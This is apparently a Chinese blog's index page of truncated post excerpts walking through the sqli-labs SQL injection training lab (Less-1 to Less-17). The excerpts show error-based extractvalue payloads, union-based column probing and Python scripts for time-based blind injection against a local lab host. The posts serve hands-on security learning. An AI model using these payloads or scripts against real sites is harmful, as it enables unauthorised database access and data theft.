LYJ20010728的博客

Less-17 报错注入【 ’ 】通过判断发现注入点存在于passwd处（在uname处\无反应，passwd处\有报错）You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1爆当前库名：1' and extractvalue(1,concat(0x7e,

Less-16 延时注入【 " 】自动注入脚本import requestsimport datetimeMAXLENGTH = 20url = "http://sqli-labs:8080/Less-16/"def getLengthOfDatabase(): for num in range(1,MAXLENGTH): payload = "admin\") and if(length(database())=%s,sleep(2),1)#" % num

Less-15 延时注入【 ’ 】自动注入脚本import requestsimport datetimeMAXLENGTH = 20url = "http://sqli-labs:8080/Less-15/"def getLengthOfDatabase(): for num in range(1,MAXLENGTH): payload = "admin' and if(length(database())=%s,sleep(2),1)#" % num

Less-14 报错注入【 " 】1、注入点判断：uname=admin\&passwd=DumbYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Dumb" LIMIT 0,1' at line 1updataxml版本2、进行报错注入得到数据库名：uname=admin

Less-13 报错注入【 ') 】1、注入点判断：uname=admin\&passwd=DumbYou have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Dumb') LIMIT 0,1' at line 1updataxml版本2、进行报错注入得到数据库名：uname=adm

Less-12 联合查询[ ") ]

Less-11 联合查询[ ’ ]

Less-10 延迟注入[ ” ]先进行注入点的测试，发现试过很多回显都是一样的，当尝试到?id=1" and sleep(5) --+，发现页面在迟缓后有回显，猜测是基于"的时间盲注，盲注脚本和less-9基本一样，改下url就行。解题脚本# less-9 url = "http://sqli-labs:8080/Less-9/?id=1' "# less-10 url = "http://sqli-labs:8080/Less-9/?id=1" "import req

Less-9 延迟注入[ ’ ]先进行注入点的测试，发现试过很多回显都是一样的，当尝试到?id=1%27%20and%20sleep(5)%20--+，发现页面在迟缓后有回显，猜测是基于’的时间盲注解题脚本import requestsimport timeimport datetimeMAXLENGTH = 20url = "http://sqli-labs:8080/Less-9/?id=1%27 "def getLengthOfDatabase(): for num in

Less-2 联合查询[ ]查看返回多少列http://sqli-labs:8080/Less-2/?id=1%20order%20by%204%20--+Unknown column '4' in 'order clause'http://sqli-labs:8080/Less-2/?id=1%20order%20by%203%20--+Your Login name:DumbYour Password:Dumb# 返回3列查看显位http://sqli-labs:8080/Les

模拟ctf的sql注入我自己在数据库中添加了flag字段盲注脚本import requestsimport string# 判断数据库的长度punctuation = string.punctuationdigits = string.digitsascii_letters = string.ascii_letterscompare_str = ascii_letters + digits + punctuationurl = "http://sqli-labs:8080/Less-8/?

Less-1 联合查询[ ’ ]查看返回了多少列http://sqli-labs:8080/Less-1/?id=1%27%20order%20by%204%20--+Unknown column '4' in 'order clause'http://sqli-labs:8080/Less-1/?id=1%27%20order%20by%203%20--+Your Login name:DumbYour Password:Dumb# 返回3列查看显位http://sqli-labs

less-5用extractvalue报错注入?id=1' --+You are in........... #无有用信息 考虑报错注入?id=1' and extractvalue(1,concat(0x7e,(select database()),0x7e)) --+XPATH syntax error: '~security~'?id=1' and extractvalue(1,concat(0x7e,(select table_name from information_s